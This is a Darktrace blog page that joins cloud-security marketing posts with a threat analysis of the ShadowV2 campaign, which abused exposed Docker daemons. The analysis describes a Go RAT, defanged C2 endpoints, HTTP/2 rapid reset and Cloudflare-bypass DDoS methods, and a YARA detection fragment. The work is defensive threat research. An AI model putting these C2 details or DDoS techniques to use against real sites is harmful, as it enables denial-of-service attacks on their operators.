Combatting the Top Three Sources of Risk in the Cloud
The biggest sources of risk in the cloud are misconfigurations, IAM failures, and infrastructure that is unprepared to handle cross-domain threats. Learn how AI-powered cloud security tools can help security teams identify and mitigate these risks.
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Pallavi Singh
Product Marketing Manager, OT Security & Compliance
Share
06
May 2025
With cloud computing, organizations are storing data like intellectual property, trade secrets, Personally Identifiable Information (PII), proprietary code and statistics, and other sensitive information in the cloud. If this data were to be accessed by malicious actors, it could incur financial loss, reputational damage, legal liabilities, and business disruption.
So, as cloud usage continues to grow, the teams in charge of protecting these deployments must understand the associated cybersecurity risks.
What are cloud risks?
Cloud threats come in many forms, with one of the key types consisting of cloud risks. These arise from challenges in implementing and maintaining cloud infrastructure, which can expose the organization to potential damage, loss, and attacks.
There are three major types of cloud risks:
1. Misconfigurations
As organizations struggle with complex cloud environments, misconfiguration is one of the leading causes of cloud security incidents. These risks occur when cloud settings leave gaps between cloud security solutions and expose data and services to unauthorized access. If discovered by a threat actor, a misconfiguration can be exploited to allow infiltration, lateral movement, escalation, and damage.
With the scale and dynamism of cloud infrastructure and the complexity of hybrid and multi-cloud deployments, security teams face a major challenge in exerting the required visibility and control to identify misconfigurations before they are exploited.
Common causes of misconfiguration come from skill shortages, outdated practices, and manual workflows. For example, potential misconfigurations can occur around firewall zones, isolated file systems, and mount systems, which all require specialized skill to set up and diligent monitoring to maintain
IAM has only increased in importance with the rise of cloud computing and remote working. It allows security teams to control which users can and cannot access sensitive data, applications, and other resources.
There are four parts to IAM: authentication, authorization, administration, and auditing and reporting. Within these, there are a lot of subcomponents as well, including but not limited to Single Sign-On (SSO), Two-Factor Authentication (2FA), Multi-Factor Authentication (MFA), and Role-Based Access Control (RBAC).
Security teams are faced with the challenge of allowing enough access for employees, contractors, vendors, and partners to complete their jobs while restricting enough to maintain security. They may struggle to track what users are doing across the cloud, apps, and on-premises servers.
When IAM is misconfigured, it increases the attack surface and can leave accounts with access to resources they do not need to perform their intended roles. This type of risk creates the possibility for threat actors or compromised accounts to gain access to sensitive company data and escalate privileges in cloud environments. It can also allow malicious insiders and users who accidentally violate data protection regulations to cause greater damage.
3. Cross-domain threats
The complexity of hybrid and cloud environments can be exploited by attacks that cross multiple domains, such as traditional network environments, identity systems, SaaS platforms, and cloud environments. These attacks are difficult to detect and mitigate, especially when a security posture is siloed or fragmented.
Some attack types inherently involve multiple domains, like lateral movement and supply chain attacks, which target both on-premises and cloud networks.
Challenges in securing against cross-domain threats often come from a lack of unified visibility. If a security team does not have unified visibility across the organization’s domains, gaps between various infrastructures and the teams that manage them can leave organizations vulnerable.
Adopting AI cybersecurity tools to reduce cloud risk
For security teams to defend against misconfigurations, IAM failures, and insecure APIs, they require a combination of enhanced visibility into cloud assets and architectures, better automation, and more advanced analytics. These capabilities can be achieved with AI-powered cybersecurity tools.
Such tools use AI and automation to help teams maintain a clear view of all their assets and activities and consistently enforce security policies.
Darktrace / CLOUD is a Cloud Detection and Response (CDR) solution that makes cloud security accessible to all security teams and SOCs by using AI to identify and correct misconfigurations and other cloud risks in public, hybrid, and multi-cloud environments.
It provides real-time, dynamic architectural modeling, which gives SecOps and DevOps teams a unified view of cloud infrastructures to enhance collaboration and reveal possible misconfigurations and other cloud risks. It continuously evaluates architecture changes and monitors real-time activity, providing audit-ready traceability and proactive risk management.
Figure 1: Real-time visibility into cloud assets and architectures built from network, configuration, and identity and access roles. In this unified view, Darktrace / CLOUD reveals possible misconfigurations and risk paths.
Darktrace / CLOUD also offers attack path modeling for the cloud. It can identify exposed assets and highlight internal attack paths to get a dynamic view of the riskiest paths across cloud environments, network environments, and between – enabling security teams to prioritize based on unique business risk and address gaps to prevent future attacks.
Darktrace’s Self-Learning AI ensures continuous cloud resilience, helping teams move from reactive to proactive defense.
[related-resource]
Tackling the 11 Biggest Cloud Threats
Discover how Darktrace / CLOUD uses AI to help security teams protect against the top cloud risks and most pressing attack types in the white paper
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Pallavi Singh
Product Marketing Manager, OT Security & Compliance
Cloud has changed everything, but investigations haven’t kept up. With breaches hitting cloud data and attackers moving faster than ever, legacy forensics are too slow, too manual, and too fragmented. It’s time for a cloud-first approach: automated, unified, and built for today’s speed of attack.
Unpacking the Salesloft Incident: Insights from Darktrace Observations
Darktrace identified anomalous activity within its customer base linked to a supply chain attack exploiting Salesloft integrations in August 2025. Learn about the campaign and how Darktrace detects and responds to such threats using AI-driven threat detection and Autonomous Response capabilities.
How Organizations are Addressing Cloud Investigation and Response
The importance of cloud investigation and incident response are compounded by an expanded attack surface in the cloud, lack of advanced tooling to upskill teams, and increasing regulatory pressure from compliance regulations. This blog dives into these challenges and explores potential solutions for security teams attempting to secure their cloud environment
Cloud adoption has revolutionized how businesses operate, offering speed, scalability, and flexibility. But for security teams, this transformation has introduced a new set of challenges, especially when it comes to incident response (IR) and forensic investigations.
Cloud-related breaches are skyrocketing – 82% of breaches now involve cloud-stored data (IBM Cost of a Data Breach, 2023). Yet incidents often go unnoticed for days: according to a 2025 report by Cybersecurity Insiders, of the 65% of organizations experienced a cloud-related incident in the past year, only 9% detected it within the first hour, and 62% took more than 24 hours to remediate it (Cybersecurity Insiders, Cloud Security Report 2025).
Despite the shift to cloud, many investigation practices remain rooted in legacy on-prem approaches. According to a recent report, 65% of organizations spend approximately 3-5 days longer when investigating an incident in the cloud vs. on premises.
Cloud investigations must evolve, or risk falling behind attackers who are already exploiting the cloud’s speed and complexity.
4 Reasons Cloud Investigations Are Broken
The cloud’s dynamic nature – with its ephemeral workloads and distributed architecture – has outpaced traditional incident response methods. What worked in static, on-prem environments simply doesn’t translate.
Here’s why:
Ephemeral workloads Containers and serverless functions can spin up and vanish in minutes. Attackers know this as well – they’re exploiting short-lived assets for “hit-and-run” attacks, leaving almost no forensic footprint. If you’re relying on scheduled scans or manual evidence collection, you’re already too late.
Fragmented tooling Each cloud provider has its own logs, APIs, and investigation workflows. In addition, not all logs are enabled by default, cloud providers typically limit the scope of their logs (both in terms of what data they collect and how long they retain it), and some logs are only available through undocumented APIs. This creates siloed views of attacker activity, making it difficult to piece together a coherent timeline. Now layer in SaaS apps, Kubernetes clusters, and shadow IT — suddenly you’re stitching together 20+ tools just to find out what happened. Analysts call it the ‘swivel-chair Olympics,’ and it’s burning hours they don’t have.
SOC overload Analysts spend the bulk of their time manually gathering evidence and correlating logs rather than responding to threats. This slows down investigations and increases burnout. SOC teams are drowning in noise; they receive thousands of alerts a day, the majority of which never get touched. False positives eat hundreds of hours a month, and consequently burnout is rife.
Cost of delay The longer an investigation takes, the higher its cost. Breaches contained in under 200 days save an average of over $1M compared to those that linger (IBM Cost of a Data Breach 2025).
These challenges create a dangerous gap for threat actors to exploit. By the time evidence is collected, attackers may have already accessed or exfiltrated data, or entrenched themselves deeper into your environment.
What’s Needed: A New Approach to Cloud Investigations
It’s time to ditch the manual, reactive grind and embrace investigations that are automated, proactive, and built for the world you actually defend. Here’s what the next generation of cloud forensics must deliver:
Automated evidence acquisition Capture forensic-level data the moment a threat is detected and before assets disappear.
Unified multi-cloud visibility Stitch together logs, timelines, and context across AWS, Azure, GCP, and hybrid environments into a single unified view of the investigation.
Accelerated investigation workflows Reduce time-to-insight from hours or days to minutes with automated analysis of forensic data, enabling faster containment and recovery.
Empowered SOC teams Fully contextualised data and collaboration workflows between teams in the SOC ensure seamless handover, freeing up analysts from manual collection tasks so they can focus on what matters: analysis and response.
Attackers are already leveraging the cloud’s agility. Defenders must do the same — adopting solutions that match the speed and scale of modern infrastructure.
Cloud Changed Everything. It’s Time to Change Investigations.
The cloud fundamentally reshaped how businesses operate. It’s time for security teams to rethink how they investigate threats.
Forensics can no longer be slow, manual, and reactive. It must be instant, automated, and cloud-first — designed to meet the demands of ephemeral infrastructure and multi-cloud complexity.
The future of incident response isn’t just faster. It’s smarter, more scalable, and built for the environments we defend today, not those of ten years ago.
Darktrace's latest investigation uncovered a novel campaign that blends traditional malware with modern devops technology.
At the center of this campaign is a Python-based command-and-control (C2) framework hosted on GitHub CodeSpaces. This campaign also utilizes a Python based spreader with a multi-stage Docker deployment as the initial access vector.
The campaign further makes use of a Go-based Remote Access Trojan (RAT) that implements a RESTful registration and polling mechanism, enabling command execution and communication with its operators.
ShadowV2 attack techniques
What sets this campaign apart is the sophistication of its attack toolkit.
The threat actors employ advanced methods such as HTTP/2 rapid reset, a Cloudflare under attack mode (UAM) bypass, and large-scale HTTP floods, demonstrating a capability to combine distributed denial-of-service (DDoS) techniques with targeted exploitation.
With the inclusion of an OpenAPI specification, implemented with FastAPI and Pydantic and a fully developed login panel and operator interface, the infrastructure seems to resemble a “DDoS-as-a-service” platform rather than a traditional botnet, showing the extent to which modern malware increasingly mirrors legitimate cloud-native applications in both design and usability.
Analysis of a SadowV2 attack
Initial access
The initial compromise originates from a Python script hosted on GitHub CodeSpaces. This can be inferred from the observed headers:
User-Agent: docker-sdk-python/7.1.0
X-Meta-Source-Client: github/codespaces
The user agent shows that the attacker is using the Python Docker SDK, a library for Python programs that allows them to interact with Docker to create containers. The X-Meta-Source-Client appears to have been injected by GitHub into the request to allow for attribution, although there is no documentation online about this header.
The IP the connections originate from is 23.97.62[.]139, which is a Microsoft IP based in Singapore. This aligns with expectations as GitHub is owned by Microsoft.
This campaign targets exposed Docker daemons, specifically those running on AWS EC2. Darktrace runs a number of honeypots across multiple cloud providers and has only observed attacks against honeypots running on AWS EC2. By default, Docker is not accessible to the Internet, however, can be configured to allow external access. This can be useful for managing complex deployments where remote access to the Docker API is needed.
Typically, most campaigns targeting Docker will either take an existing image from Docker Hub and deploy their tools within it, or upload their own pre-prepared image to deploy. This campaign works slightly differently; it first spawns a generic “setup” container and installs a number of tools within it. This container is then imaged and deployed as a live container with the malware arguments passed in via environmental variables.
Figure 1: Attacker creates a blank container from an Ubuntu image.
Figure 2: Attacker sets up their tools for the attack.
Figure 3: Attacker deploys a new container using the image from the setup container.
It is unclear why the attackers chose this approach - one possibility is that the actor is attempting to avoid inadvertently leaving forensic artifacts by performing the build on the victim machine, rather than building it themselves and uploading it.
Malware analysis
The Docker container acts as a wrapper around a single binary, dropped in /app/deployment. This is an ELF binary written in Go, a popular choice for modern malware. Helpfully, the binary is unstripped, making analysis significantly easier.
The current version of the malware has not been reported by OSINT providers such as VirusTotal. Using the domain name from the MASTER_ADDR variable and other IoCs, we were able to locate two older versions of the malware that were submitted to VirusTotal on the June 25 and July 30 respectively [1] [2]. Neither of these had any detections and were only submitted once each using the web portal from the US and Canada respectively. Darktrace first observed the attack against its honeypot on June 24, so it could be a victim of this campaign submitting the malware to VirusTotal. Due to the proximity of the start of the attacks, it could also be the attacker testing for detections, however it is not possible to know for certain.
The malware begins by phoning home, using the MASTER_ADDR and VPS_NAME identifiers passed in from the Docker run environmental variables. In addition, the malware derives a unique VPS_ID, which is the VPS_NAME concatenated with the current unix timestamp. The VPS_ID is used for all communications with the C2 server as the identifier for the specific implant. If the malware is restarted, or the victim is re-infected, the C2 server will inform the implant of its original VPS_ID to ensure continuity.
Figure 4: Snippet that performs the registration by sending a POST request to the C2 API with a JSON structure.
From there, the malware then spawns two main loops that will remain active for the lifetime of the implant. Every second, it sends a heartbeat to the C2 by sending the VPS_ID to hxxps://shadow.aurozacloud[.]xyz/api/vps/heartbeat via POST request. Every 5 seconds, it retrieves hxxps://shadow.aurozacloud[.]xyz/api/vps/poll/<VPS ID> via a GET request to poll for new commands.
Figure 5: The poll mechanism.
At this stage, Darktrace security researchers wrote a custom client that ran on the server infected by the attacker that mimicked their implant. The goal was to intercept commands from the C2. Based on this, it was observed initiating an attack against chache08[.]werkecdn[.]me using a 120 thread HTTP2 rapid reset attack. This site appears to be hosted on an Amsterdam VPS provided by FDCServers, a server hosting company. It was not possible to identify what normally runs on this site, as it returns a 403 Forbidden error when visited.
Darktrace’s code analysis found that the returned commands contain the following fields:
Method (e.g. GET, POST)
A unique ID for the attack
A URL endpoint used to report attack statistics
The target URL & port
The duration of the attack
The number of threads to use
An optional proxy to send HTTP requests through
The malware then spins up several threads, each running a configurable number of HTTP clients using Valyala’s fasthttp library, an open source Go library for making high-performance HTTP requests. After this is complete, it uses these clients to perform an HTTP flood attack against the target.
Figure 6: A snippet showing the fasthttp client creation loop, as well as a function to report the worker count back to the C2.
In addition, it also features several flags to enable different bypass mechanisms to augment the malware:
WordPress bypass (does not appear to be implemented - the flag is not used anywhere)
Random query strings appended to the URL
Spoofed forwarding headers with random IP addresses
Cloudflare under-attack-mode (UAM) bypass
HTTP2 rapid reset
The most interesting of these is the Cloudflare UAM bypass mechanism. When this is enabled, the malware will attempt to use a bundled ChromeDP binary to solve the Cloudflare JavaScript challenge that is presented to new visitors. If this succeeds, the clearance cookie obtained is then included in subsequent requests. This is unlikely to work in most cases as headless Chrome browsers are often flagged, and a regular CAPTCHA is instead served.
Figure 7: The UAM bypass success snippet.
Additionally, the malware has a flag to enable an HTTP2 rapid reset attack mode instead of a regular HTTP flood. In HTTP2, a client can create thousands of requests within a single connection using multiplexing, allowing sites to load faster. The number of request streams per connection is capped however, so in a rapid reset attack many requests are made and then immediately cancelled to allow more requests to be created. This allows a single client to execute vastly more requests per second and use more server resources than it otherwise would, allowing for more effective denial-of-service (DoS) attacks.
Figure 8: The HTTP2 rapid reset snippet from the main attack function.
API/C2 analysis
As mentioned throughout the malware analysis section, the malware communicates with a C2 server using HTTP. The server is behind Cloudflare, which obscures its hosting location and prevents analysis. However, based on analysis of the spreader, it's likely running on GitHub CodeSpaces.
When sending a malformed request to the API, an error generated by the Pydantic library is returned:
This shows they are using Python for the API, which is the same language that the spreader is written in.
One of the larger frameworks that ships with Pydantic is FastAPI, which also ships with Swagger. The malware author left this publicly exposed, and Darktrace’s researchers were able to obtain a copy of their API documentation. The author appears to have noticed this however, as subsequent attempts to access it now returns a HTTP 404 Not Found error.
Figure 9: Swagger UI view based on the obtained OpenAPI spec.
This is useful to have as it shows all the API endpoints, including the exact fields they take and return, along with comments on each endpoint written by the attacker themselves.
It is very likely a DDoS for hire platform (or at the very least, designed for multi-tenant use) based on the extensive user API, which features authentication, distinctions between privilege level (admin vs user), and limitations on what types of attack a user can execute. The screenshot below shows the admin-only user create endpoint, with the default limits.
Figure 10: The admin-only user create endpoint.
The endpoint used to launch attacks can also be seen, which lines up with the options previously seen in the malware itself. Interestingly, this endpoint requires a list of zombie systems to launch the attack from. This is unusual as most DDoS for hire services will decide this internally or just launch the attack from every infected host (zombie). No endpoints that returned a list of zombies were found, however, it’s possible one exists as the return types are not documented for all the API endpoints.
Figure 11: The attack start endpoint.
There is also an endpoint to manage a blacklist of hosts that cannot be attacked. This could be to stop users from launching attacks against sites operated by the malware author, however it’s also possible the author could be attempting to sell protection to victims, which has been seen previously with other DDoS for hire services.
Figure 12: Blacklist endpoints.
Attempting to visit shadow[.]aurozacloud[.]xyz results in a seizure notice. It is most likely fake the same backend is still in use and all of the API endpoints continue to work. Appending /login to the end of the path instead brings up the login screen for the DDoS platform. It describes itself as an “advanced attack platform”, which highlights that it is almost certainly a DDoS for hire service. The UI is high quality, written in Tailwind, and even features animations.
Figure 13: The fake seizure notice.
Figure 14: The login UI at /login.
Conclusion
By leveraging containerization, an extensive API, and with a full user interface, this campaign shows the continued development of cybercrime-as-a-service. The ability to deliver modular functionality through a Go-based RAT and expose a structured API for operator interaction highlights how sophisticated some threat actors are.
For defenders, the implications are significant. Effective defense requires deep visibility into containerized environments, continuous monitoring of cloud workloads, and behavioral analytics capable of identifying anomalous API usage and container orchestration patterns. The presence of a DDoS-as-a-service panel with full user functionality further emphasizes the need for defenders to think of these campaigns not as isolated tools but as evolving platforms.
uint16(0) == 0x457f and (2 of ($string*) or 2 of ($symbol*) or any of ($code*))
}
The content provided in this blog is published by Darktrace for general informational purposes only and reflects our understanding of cybersecurity topics, trends, incidents, and developments at the time of publication. While we strive to ensure accuracy and relevance, the information is provided “as is” without any representations or warranties, express or implied. Darktrace makes no guarantees regarding the completeness, accuracy, reliability, or timeliness of any information presented and expressly disclaims all warranties.
Nothing in this blog constitutes legal, technical, or professional advice, and readers should consult qualified professionals before acting on any information contained herein. Any references to third-party organizations, technologies, threat actors, or incidents are for informational purposes only and do not imply affiliation, endorsement, or recommendation.
Darktrace, its affiliates, employees, or agents shall not be held liable for any loss, damage, or harm arising from the use of or reliance on the information in this blog.
The cybersecurity landscape evolves rapidly, and blog content may become outdated or superseded. We reserve the right to update, modify, or remove any content without notice.